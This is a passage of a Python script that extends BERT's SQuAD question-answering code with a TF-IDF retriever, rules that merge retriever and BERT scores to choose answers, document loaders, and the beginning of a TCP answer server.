seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
output_weights = tf.get_variable(
"cls/squad/output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"cls/squad/output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
return (start_logits, end_logits)
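# Shape summary for create_model() above (B = batch size, S = max_seq_length,
# H = hidden size): final_hidden is [B, S, H]; multiplying the flattened
# [B*S, H] matrix by the transposed [2, H] output weights and reshaping gives
# [B, S, 2], which is transposed and unstacked into start_logits and end_logits,
# each of shape [B, S] -- one score per token for the answer start and end.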
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps, use_tpu,
use_one_hot_embeddings):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
tf.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape))
unique_ids = features["unique_ids"]
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
(start_logits, end_logits) = create_model(
bert_config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
tvars = tf.trainable_variables()
#tvars = tf.trainable_variables()
initialized_variable_names = {}
scaffold_fn = None
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
if use_tpu:
def tpu_scaffold():
print('tpu_scaffold step1')
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
print('tpu_scaffold step2')
return tf.train.Scaffold()
#tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
#return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
print('not initcheck')
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
seq_length = modeling.get_shape_list(input_ids)[1]
def compute_loss(logits, positions):
one_hot_positions = tf.one_hot(
positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits, axis=-1)
loss = -tf.reduce_mean(
tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
return loss
start_positions = features["start_positions"]
end_positions = features["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2.0
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
scaffold_fn=scaffold_fn)
elif mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
"unique_ids": unique_ids,
"start_logits": start_logits,
"end_logits": end_logits,
}
output_spec = tfori.contrib.tpu.TPUEstimatorSpec(
mode=mode, predictions=predictions, scaffold_fn=scaffold_fn)
print('scaffold_fn, step3')
else:
raise ValueError(
"Only TRAIN and PREDICT modes are supported: %s" % (mode))
return output_spec
return model_fn
def input_fn_builder(input_file, seq_length, is_training, drop_remainder):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
name_to_features = {
"unique_ids": tf.io.FixedLenFeature([], tf.int64),
"input_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
"input_mask": tf.io.FixedLenFeature([seq_length], tf.int64),
"segment_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
}
if is_training:
name_to_features["start_positions"] = tf.io.FixedLenFeature([], tf.int64)
name_to_features["end_positions"] = tf.io.FixedLenFeature([], tf.int64)
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.parse_single_example(record, name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
return example
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
d = tf.data.TFRecordDataset(input_file)
if is_training:
d = d.repeat()
d = d.shuffle(buffer_size=100)
d = d.apply(
tf.contrib.data.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
drop_remainder=drop_remainder))
return d
return input_fn
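# Typical wiring for the two builders above (sketch only; the exact estimator
# setup lives elsewhere in this script and may differ): model_fn_builder()
# produces the model_fn handed to tf.contrib.tpu.TPUEstimator, and
# input_fn_builder() produces the input_fn passed to estimator.predict() or
# estimator.train() over the TFRecord file written from the features.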
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
RawResult = collections.namedtuple("RawResult",
["unique_id", "start_logits", "end_logits"])
def write_predictions(all_examples, all_features, all_results, n_best_size,
max_answer_length, do_lower_case
):
"""Write final predictions to the json file and log-odds of null if needed."""
global ranker
'''
tf.logging.info("Writing predictions to: %s" % (output_prediction_file))
tf.logging.info("Writing nbest to: %s" % (output_nbest_file))
tf.logging.info("Writing Aten predic to: %s" % (output_Aten_predict_file))
'''
ans_list = []
text_list = []
example_index_to_features = collections.defaultdict(list)
for feature in all_features:
example_index_to_features[feature.example_index].append(feature)
unique_id_to_result = {}
#tf.logging.info("length of all_results: %d" % (len(all_results)))
for result in all_results:
unique_id_to_result[result.unique_id] = result
_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name
"PrelimPrediction",
["feature_index", "start_index", "end_index", "start_logit", "end_logit"])
# Willy Addd collections -> for results
#-------------------------------------------------------------------------------
_AllPredictions = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictions",
["question", "PredictListOneQues"])
_AllPredictResultsInOneQuestion = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictResultsInOneQuestion",
["doc_text", "doc_id", "doc_score", "PredictListOneDoc"])
_AllPredictResultsInOneDocument = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictResultsInOneDocument",
["answer", "prob", "start", "end"])
_FinalResult = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult",
["question", "text", "text_id", "ans", "prob"])
_FinalResult2 = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult2",
["question", "text", "ans", "prob"])
_FinalResult3 = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult3",
["question", "text", "ans", "ans_prob", "TFIDF", "Score", "choice"])
_FinalResultAll = collections.namedtuple( # pylint: disable=invalid-name
"FinalResultAll",
["question", "text1", "ans1", "ans_prob1", "TFIDF1", "Score1", "text2", "ans2", "ans_prob2", "TFIDF2", "Score2", "choice"])
_TempAllpredict_Layer1 = collections.namedtuple( # pylint: disable=invalid-name
"TempAllpredict_Layer1",
["question" , "TempAllpredictList_Layer2"])
_TempAllpredict_Layer2 = collections.namedtuple( # pylint: disable=invalid-name
"TempAllpredict_Layer2",
["doc_id","doc_text","best_ans","best_prob"])
#-------------------------------------------------------------------------------
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict()
all_predicts = []
all_predictsInOneQues = []
quesList = []
Aten_result_list = []
Aten_result3_list = []
TempAllpredictLayer1_list = []
TempAllpredictLayer2_list = []
best_answer=""
best_prob=0.0
ans_is_null = True
#ranker = retriever.get_class('tfidf')(tfidf_path=FLAGS.retriever_model)
for (example_index, example) in enumerate(all_examples):
features = example_index_to_features[example_index]
if example_in_write_predictions == 1:
print ("example idx:%d" %example_index)
print("question in example from predict")
print(example.question_text)
print("doc_tokens in example from predict")
print(example.doc_tokens)
print('-'*60)
print('\n')
doc_names = []
doc_scores = []
try:
doc_names, doc_scores = ranker.closest_docs( example.question_text, 10 )
except Exception:
doc_names.append('None')
doc_scores.append(0)
prelim_predictions = []
# keep track of the minimum score of null start+end of position 0
score_null = 1000000 # large and positive
min_null_feature_index = 0 # the paragraph slice with min null score
null_start_logit = 0 # the start logit at the slice with min null score
null_end_logit = 0 # the end logit at the slice with min null score
for (feature_index, feature) in enumerate(features):
result = unique_id_to_result[feature.unique_id]
start_indexes = _get_best_indexes(result.start_logits, n_best_size)
end_indexes = _get_best_indexes(result.end_logits, n_best_size)
# if we could have irrelevant answers, get the min score of irrelevant
if FLAGS.version_2_with_negative:
feature_null_score = result.start_logits[0] + result.end_logits[0]
if feature_null_score < score_null:
score_null = feature_null_score
min_null_feature_index = feature_index
null_start_logit = result.start_logits[0]
null_end_logit = result.end_logits[0]
for start_index in start_indexes:
for end_index in end_indexes:
# We could hypothetically create invalid predictions, e.g., predict
# that the start of the span is in the question. We throw out all
# invalid predictions.
if start_index >= len(feature.tokens):
continue
if end_index >= len(feature.tokens):
continue
if start_index not in feature.token_to_orig_map:
continue
if end_index not in feature.token_to_orig_map:
continue
if not feature.token_is_max_context.get(start_index, False):
continue
if end_index < start_index:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
prelim_predictions.append(
_PrelimPrediction(
feature_index=feature_index,
start_index=start_index,
end_index=end_index,
start_logit=result.start_logits[start_index],
end_logit=result.end_logits[end_index]))
if FLAGS.version_2_with_negative:
prelim_predictions.append(
_PrelimPrediction(
feature_index=min_null_feature_index,
start_index=0,
end_index=0,
start_logit=null_start_logit,
end_logit=null_end_logit))
prelim_predictions = sorted(
prelim_predictions,
key=lambda x: (x.start_logit + x.end_logit),
reverse=True)
_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name
"NbestPrediction", ["text", "start_logit", "end_logit"])
seen_predictions = {}
nbest = []
for pred in prelim_predictions:
if len(nbest) >= n_best_size:
break
feature = features[pred.feature_index]
if pred.start_index > 0: # this is a non-null prediction
tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)]
orig_doc_start = feature.token_to_orig_map[pred.start_index]
orig_doc_end = feature.token_to_orig_map[pred.end_index]
orig_tokens = example.doc_tokens[orig_doc_start:(orig_doc_end + 1)]
tok_text = " ".join(tok_tokens)
# De-tokenize WordPieces that have been split off.
tok_text = tok_text.replace(" ##", "")
tok_text = tok_text.replace("##", "")
# Clean whitespace
tok_text = tok_text.strip()
tok_text = " ".join(tok_text.split())
orig_text = " ".join(orig_tokens)
final_text = get_final_text(tok_text, orig_text, do_lower_case)
if final_text in seen_predictions:
continue
seen_predictions[final_text] = True
else:
final_text = ""
seen_predictions[final_text] = True
nbest.append(
_NbestPrediction(
text=final_text,
start_logit=pred.start_logit,
end_logit=pred.end_logit))
# if we didn't include the empty option in the n-best, include it
if FLAGS.version_2_with_negative:
if "" not in seen_predictions:
nbest.append(
_NbestPrediction(
text="", start_logit=null_start_logit,
end_logit=null_end_logit))
# In very rare edge cases we could have no valid predictions. So we
# just create a nonce prediction in this case to avoid failure.
if not nbest:
nbest.append(
_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))
assert len(nbest) >= 1
total_scores = []
best_non_null_entry = None
for entry in nbest:
total_scores.append(entry.start_logit + entry.end_logit)
if not best_non_null_entry:
if entry.text:
best_non_null_entry = entry
# Reference
probs = _compute_softmax(total_scores)
nbest_json = []
for i, entry in enumerate(nbest):
output = collections.OrderedDict()
output["text"] = entry.text
output["probability"] = probs[i]
output["start_logit"] = entry.start_logit
output["end_logit"] = entry.end_logit
nbest_json.append(output)
#----------------------------------------------
# Assumption: questions arrive in order
# "question", "PredictResults"
if example.question_text not in quesList :
if len(quesList)!=0 :
#1. Save to all predicts
#print('all_predictsInOneQues-')
#print(all_predictsInOneQues)
temp = copy.deepcopy(all_predictsInOneQues)
#print('temp')
#print(temp)
all_predicts.append(
_AllPredictions(
question=quesList[-1],
PredictListOneQues=temp
)
)
#2.TODO : Find the result (move to outside)
#3. reset all_predictsInOneQues
all_predictsInOneQues.clear()
# Add to quesList
quesList.append(example.question_text)
#----------------------------------------------
# save answer dataset
#----------------------------------------------
all_predictsInOneDoc = []
#print('go to (1)')
for i, entry in enumerate(nbest):
tp_answer = entry.text
#print('ids:%d:%s' %(i,tp_answer))
for i, entry in enumerate(nbest):
tp_answer = entry.text
if len(all_predictsInOneDoc) != 0:
break
temp = tp_answer.replace(" ", "")
if not temp:
continue
if len(tp_answer) < 3:
if not RepresentsInt(tp_answer):
continue
all_predictsInOneDoc.append(
_AllPredictResultsInOneDocument(
answer=entry.text,
prob=Decimal(probs[i]),
start=entry.start_logit,
end=entry.end_logit
)
)
if len(all_predictsInOneDoc) == 0:
for i, entry in enumerate(nbest):
if predict_result_index == 1:
print(entry)
if i == 2:
if predict_result_index == 1:
print('In state 2')
break
tp_answer = entry.text
if i == 0:
if tp_answer.isspace() or not tp_answer:
if predict_result_index == 1:
print('In state 0,tp_ans: %s' % tp_answer)
continue
if i == 1 and len(all_predictsInOneDoc) != 0:
if predict_result_index == 1:
print('In state 1,tp_ans: %s' % tp_answer)
break
if predict_result_index == 1:
print('In state set pridict. tp_ans: %s' % tp_answer)
all_predictsInOneDoc.append(
_AllPredictResultsInOneDocument(
answer=entry.text,
prob=Decimal(probs[i]),
start=entry.start_logit,
end=entry.end_logit
)
)
nbest.clear()
#print('go to (2)')
#----------------------------------------------
# End of save answer dataset
if predict_result_index == 1:
for i, entry in enumerate(all_predictsInOneDoc):
print('index:%d' %i)
print("answer: %s" %(entry.answer))
print("prob: %s" %(entry.prob))
print("start: %s" %(entry.start))
print("end: %s" %(entry.end))
print('\n')
print('-'*15)
print('\n')
#----------------------------------------------
tp_docscore = 0.0
if example.doc_id in doc_names :
tp_docindex = doc_names.index(example.doc_id)
tp_docscore = doc_scores [tp_docindex]
#print('go to (4)')
#print('go to (5)')
#print('all_predictsInOneQues-in set')
#print(all_predictsInOneQues)
all_predictsInOneQues.append(
_AllPredictResultsInOneQuestion(
doc_text=example.doc_tokens,
doc_id=example.doc_id,
doc_score=tp_docscore,
PredictListOneDoc=all_predictsInOneDoc
)
)
#----------------------------------------------
# if example is examples last data
if example == all_examples[-1] :
all_predicts.append(
_AllPredictions(question=example.question_text,PredictListOneQues=all_predictsInOneQues))
#----------------------------------------------
assert len(nbest_json) >= 1
if not FLAGS.version_2_with_negative:
all_predictions[example.qas_id] = nbest_json[0]["text"]
else:
# predict "" iff the null score - the score of best non-null > threshold
if best_non_null_entry is None:
score_diff = FLAGS.null_score_diff_threshold + 1.0
else:
score_diff = score_null - best_non_null_entry.start_logit - (
best_non_null_entry.end_logit)
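# A worked example with illustrative numbers (not taken from the data):
# score_null = -2.0 and best non-null start+end = -5.5 give score_diff = 3.5;
# with null_score_diff_threshold = 0.0 the empty answer ("") would be predicted.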
scores_diff_json[example.qas_id] = score_diff
if score_diff > FLAGS.null_score_diff_threshold:
all_predictions[example.qas_id] = ""
else:
all_predictions[example.qas_id] = best_non_null_entry.text
all_nbest_json[example.qas_id] = nbest_json
# Find the best answer from Aten collections
#----------------------------------------------
retriever_weight = FLAGS.retriever_weight
for i, entry_predicts in enumerate(all_predicts):
tp_ques = entry_predicts.question
QuesList = entry_predicts.PredictListOneQues
#print("ques: %s" %(tp_ques))
# Score using BERT only; TF-IDF is used only to choose the document.
#----------------------------------------------
QuesList.sort(key=TakeThird, reverse=True)
#print('len with QuesList:%d' %len(QuesList))
tp_text1 = QuesList[0].doc_text
text1=""
for word in tp_text1:
text1= text1 + " " + word
ans1=""
ans1_prob = 0.0
TFIDF1 = QuesList[0].doc_score
Score1 = 0.0
entry_OneDoc = QuesList [0].PredictListOneDoc
if len(entry_OneDoc) != 0 :
ans1 = entry_OneDoc[0].answer
ans1_prob = entry_OneDoc[0].prob
for k, entry_OneAns in enumerate(entry_OneDoc):
#print('index:%d' %k)
tp_ans1_prob = Decimal(entry_OneAns.prob)
if tp_ans1_prob > ans1_prob:
ans1_prob = tp_ans1_prob
ans1 = entry_OneAns.answer
#print('Ans_ans:%s' %(entry_OneAns.answer))
#print('Ans_prob:%e , start:%e , end:%e' %(entry_OneAns.prob , entry_OneAns.start , entry_OneAns.end))
Score1 = ans1_prob
#----------------------------------------------
# set score with bert and TF-IDF
#----------------------------------------------
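# The weighted score below combines the retriever (TF-IDF) score with the BERT
# answer probability. A worked example with illustrative numbers (not from the
# data): retriever_weight=0.3, TFIDF=0.8, prob=0.6 gives
#   Score2 = 0.3*0.8 + (1 - 0.3)*0.6 = 0.24 + 0.42 = 0.66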
text2=""
ans2=""
ans2_prob = 0.0
TFIDF2 = 0.0
Score2 = 0.0
for j , entry_OneDoc in enumerate(QuesList):
tp_TFIDF2 = entry_OneDoc.doc_score
tp_text2=""
for word in entry_OneDoc.doc_text:
tp_text2 = tp_text2 + " " + word
DocList = []
DocList = entry_OneDoc.PredictListOneDoc
for k, entry_OneAns in enumerate(DocList):
tp_ans2_prob = Decimal(entry_OneAns.prob)
tp_Score2 = Decimal(retriever_weight)*Decimal(tp_TFIDF2) + Decimal(1.0-retriever_weight)*Decimal(tp_ans2_prob)
if tp_Score2>Score2:
text2=tp_text2
ans2=entry_OneAns.answer
ans2_prob=tp_ans2_prob
TFIDF2=tp_TFIDF2
Score2 =tp_Score2
#----------------------------------------------
fin_text = text1
fin_ans = ans1
fin_ans_prob = ans1_prob
fin_TFIDF = TFIDF1
fin_Score = Score1
choice_value = 0
if TFIDF1<FLAGS.choice_score:
#print("Answer2 State1")
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
elif ans2_prob>ans1_prob*2 and ans2_prob > FLAGS.threshold_prob_ans_merge:
#print("Answer2 State2")
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
else:
use_ans2 = False
if len(ans1)<3:
#print("Answer2 State3,len=%d" %len(ans1))
use_ans2 = True
else:
for char in ans1:
#print("Answer2 State4")
if char<' ' or char>'~' :
print(ord(char))
use_ans2 = True
break
if use_ans2 == True :
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
#else:
#print("Answer1 State1")
ans_list.append(fin_ans)
text_list.append(fin_text)
if FLAGS.show_all_choice == 0:
Aten_result3_list.append(
_FinalResult3(
question = tp_ques,
text = fin_text,
ans = fin_ans,
ans_prob = fin_ans_prob,
TFIDF = fin_TFIDF,
Score = fin_Score,
choice = choice_value
)
)
else :
Aten_result3_list.append(
_FinalResultAll(
question = tp_ques,
text1 = text1,
ans1 = ans1,
ans_prob1 = ans1_prob,
TFIDF1 = TFIDF1,
Score1 = Score1,
text2 = text2,
ans2 = ans2,
ans_prob2 = ans2_prob,
TFIDF2 = TFIDF2,
Score2 = Score2,
choice = choice_value
)
)
print('ques: %s' %tp_ques)
if FLAGS.show_all_choice==1:
print('-'*5)
print('Only BERT (TF-IDF used only to choose the document):')
print('text: %s' %text1)
print('ans: %s' %ans1)
print('Show ans1:')
print('ans_prob: %s' %ans1_prob)
print('TFIDF: %s' %TFIDF1)
print('Score: %s' %Score1)
print('')
print('-'*5)
print('Merge TF-IDF:')
print('text: %s' %text2)
print('ans: %s' %ans2)
print('ans_prob: %s' %ans2_prob)
print('TFIDF: %s' %TFIDF2)
print('Score: %s' %Score2)
print('-'*5)
print('My Choice ans(%d):' %choice_value)
print('text: %s' %fin_text)
print('ans: %s' %fin_ans)
print('ans_prob: %s' %fin_ans_prob)
print('TFIDF: %s' %fin_TFIDF)
print('Score: %s' %fin_Score)
# ack message to Colab Client
#temp_answer = 'Dr_Answer' + fin_ans + 'Dr_QA' + fin_text + '<AtenEnd>'
Aten_result3_list.clear()
return ans_list, text_list
def get_final_text(pred_text, orig_text, do_lower_case):
"""Project the tokenized prediction back to the original text."""
# When we created the data, we kept track of the alignment between original
# (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
# now `orig_text` contains the span of our original text corresponding to the
# span that we predicted.
#
# However, `orig_text` may contain extra characters that we don't want in
# our prediction.
#
# For example, let's say:
# pred_text = steve smith
# orig_text = Steve Smith's
#
# We don't want to return `orig_text` because it contains the extra "'s".
#
# We don't want to return `pred_text` because it's already been normalized
# (the SQuAD eval script also does punctuation stripping/lower casing but
# our tokenizer does additional normalization like stripping accent
# characters).
#
# What we really want to return is "Steve Smith".
#
# Therefore, we have to apply a semi-complicated alignment heuristic between
# `pred_text` and `orig_text` to get a character-to-character alignment. This
# can fail in certain cases in which case we just return `orig_text`.
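# A sketch of the intended behaviour, using the example above (values are
# illustrative, not taken from the data):
#   get_final_text("steve smith", "Steve Smith's", do_lower_case=True)
#   -> "Steve Smith"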
def _strip_spaces(text):
ns_chars = []
ns_to_s_map = collections.OrderedDict()
for (i, c) in enumerate(text):
if c == " ":
continue
ns_to_s_map[len(ns_chars)] = i
ns_chars.append(c)
ns_text = "".join(ns_chars)
return (ns_text, ns_to_s_map)
# We first tokenize `orig_text`, strip whitespace from the result
# and `pred_text`, and check if they are the same length. If they are
# NOT the same length, the heuristic has failed. If they are the same
# length, we assume the characters are one-to-one aligned.
tokenizer = tokenization.BasicTokenizer(do_lower_case=do_lower_case)
tok_text = " ".join(tokenizer.tokenize(orig_text))
start_position = tok_text.find(pred_text)
if start_position == -1:
if FLAGS.verbose_logging:
tf.logging.info(
"Unable to find text: '%s' in '%s'" % (pred_text, orig_text))
return orig_text
end_position = start_position + len(pred_text) - 1
(orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
(tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
if len(orig_ns_text) != len(tok_ns_text):
if FLAGS.verbose_logging:
tf.logging.info("Length not equal after stripping spaces: '%s' vs '%s'",
orig_ns_text, tok_ns_text)
return orig_text
# We then project the characters in `pred_text` back to `orig_text` using
# the character-to-character alignment.
tok_s_to_ns_map = {}
for (i, tok_index) in six.iteritems(tok_ns_to_s_map):
tok_s_to_ns_map[tok_index] = i
orig_start_position = None
if start_position in tok_s_to_ns_map:
ns_start_position = tok_s_to_ns_map[start_position]
if ns_start_position in orig_ns_to_s_map:
orig_start_position = orig_ns_to_s_map[ns_start_position]
if orig_start_position is None:
if FLAGS.verbose_logging:
tf.logging.info("Couldn't map start position")
return orig_text
orig_end_position = None
if end_position in tok_s_to_ns_map:
ns_end_position = tok_s_to_ns_map[end_position]
if ns_end_position in orig_ns_to_s_map:
orig_end_position = orig_ns_to_s_map[ns_end_position]
if orig_end_position is None:
if FLAGS.verbose_logging:
tf.logging.info("Couldn't map end position")
return orig_text
output_text = orig_text[orig_start_position:(orig_end_position + 1)]
return output_text
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes
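# A minimal usage sketch with illustrative values:
#   _get_best_indexes([0.1, 2.3, -1.0, 0.7], n_best_size=2) -> [1, 3]
# (the indexes of the two largest logits, in descending order of score)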
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = math.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs
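# A minimal usage sketch with illustrative values:
#   _compute_softmax([1.0, 2.0, 3.0]) -> [~0.090, ~0.245, ~0.665]
# (scores are shifted by the maximum before exponentiation for numerical stability)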
class FeatureWriter(object):
"""Writes InputFeature to TF example file."""
def __init__(self, predict_fn):
self.num_features = 0
self.predict_fn=predict_fn
self.tf_examples = []
def process_feature(self, feature):
"""Write a InputFeature to the TFRecordWriter as a tf.train.Example."""
def create_int_feature(values):
feature = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return feature
self.num_features += 1
#print('process_feature:%d'%self.num_features)
features = collections.OrderedDict()
features["unique_ids"] = create_int_feature([feature.unique_id])
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
outs = self.predict_fn( {'examples':[tf_example.SerializeToString()]} )
all_results_pb.append( outs )
self.tf_examples.clear()
'''
self.tf_examples.append(tf_example.SerializeToString())
if self.num_features%FLAGS.predict_batch_size==0:
if len(self.tf_examples)!=8:
print('size error:%d' %len(self.tf_examples))
outs = self.predict_fn
(
{
'examples':[
self.tf_examples[0],self.tf_examples[1],self.tf_examples[2],self.tf_examples[3],
self.tf_examples[4],self.tf_examples[5],self.tf_examples[6],self.tf_examples[7]
]
}
)
all_results_pb.append( outs )
for i, out in enumerate(outs):
#print('Index %d:' %i)
#print(out)
all_results_pb.append( out )
self.tf_examples.clear()
'''
def close(self):
'''
if len(self.tf_examples)!=0:
print('alignment data error (%d) in FeatureWriter' % (len(self.tf_examples)))
'''
self.tf_examples.clear()
def validate_flags_or_throw(bert_config):
"""Validate the input FLAGS or throw an exception."""
tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case,
FLAGS.init_checkpoint)
if not FLAGS.do_train and not FLAGS.do_predict:
raise ValueError("At least one of `do_train` or `do_predict` must be True.")
if FLAGS.do_train:
if not FLAGS.train_file:
raise ValueError(
"If `do_train` is True, then `train_file` must be specified.")
if FLAGS.do_predict:
if not FLAGS.predict_file:
raise ValueError(
"If `do_predict` is True, then `predict_file` must be specified.")
if FLAGS.max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(FLAGS.max_seq_length, bert_config.max_position_embeddings))
if FLAGS.max_seq_length <= FLAGS.max_query_length + 3:
raise ValueError(
"The max_seq_length (%d) must be greater than max_query_length "
"(%d) + 3" % (FLAGS.max_seq_length, FLAGS.max_query_length))
# Retriever - added by Willy
if FLAGS.do_retriever:
if not FLAGS.retriever_model:
raise ValueError("You have to set retriever model(give the path) when you set do_retriever to Yes.")
if FLAGS.document_type != 'Sqlite' or FLAGS.db_file == None :
raise ValueError("You have to set document_type to Sqlit and set the db_file when you set do_retriever to Yes.")
# TODO : think a mechanism to chek these key word
'''
if FLAGS.document_type is 'SQlite':
# TODO: set database
elif FLAGS.document_type is 'Text':
# TODO: set text file
elif FLAGS.document_type is 'SQuAD':
# is original method
else :
raise ValueError(
"You have to set correct document_type: (1)'SQlite' (2)'Text' (3)SQuAD.")
'''
def read_squad_documents(input_file):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
documents = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
documents.append(paragraph["context"])
return documents
def read_sqlite_documents(input_file):
# TODO
db_class = retriever.get_class('sqlite')
with db_class(input_file) as doc_db:
doc_ids = doc_db.get_doc_ids()
for ids in doc_ids:
documents.append(doc_db.get_doc_text(ids))
doc_db.close()
DOC2IDX = {doc_id: i for i, doc_id in enumerate(doc_ids)}
return DOC2IDX, documents
def read_text_documents(input_file):
examples = []
file = open(input_file, "r")
documents = file.read()
file.close()
documents_split = documents.split('\n')
documents_final = list(filter(None, documents_split))  # drop empty lines
return documents_final
def read_squad_question(input_file):
questions = []
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
for entry in input_data:
for paragraph in entry["paragraphs"]:
for qa in paragraph["qas"]:
questions.append(qa["question"])
return questions
def set_eval_examples(questions, DOC2IDX):
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
eval_examples = []
temp_list = []
for i, DOCID in enumerate(DOC2IDX) :
temp_list.append(DOCID)
for question in questions:
#-------------------------questions - Start---------------------------#
question_text = question
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
#-------------documents - Start--------------#
for i , paragraph_text in enumerate(documents):
paragraph_text = paragraph_text
#-------paragraphs - Start-------#
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
#-------paragraphs - End-------#
qas_id = str(uuid.uuid1())
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_id = temp_list[i],
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
eval_examples.append(example)
#-------------documents - End--------------#
#-------------------------questions - End-----------------------------#
if example_in_set_eval_examples == 1:
print('len of eval_examples:%d' %len(eval_examples))
for i, example in enumerate(eval_examples):
print(i)
print (example.question_text)
'''
for i, example in enumerate(eval_examples):
print('idx:%d:%s' %(i,example.question_text))
'''
return eval_examples
from socket import *
import sys
import threading
import time
from time import localtime
import imp
BUFSIZ = 4096
if sys.version[0] == '2':
imp.reload(sys)
sys.setdefaultencoding("utf-8")
class TcpServer():
def __init__(self,tokenizer,DOC2IDX):
self.HOST = FLAGS.Host_TCPServer
self.PORT = FLAGS.PORT_TCPServer
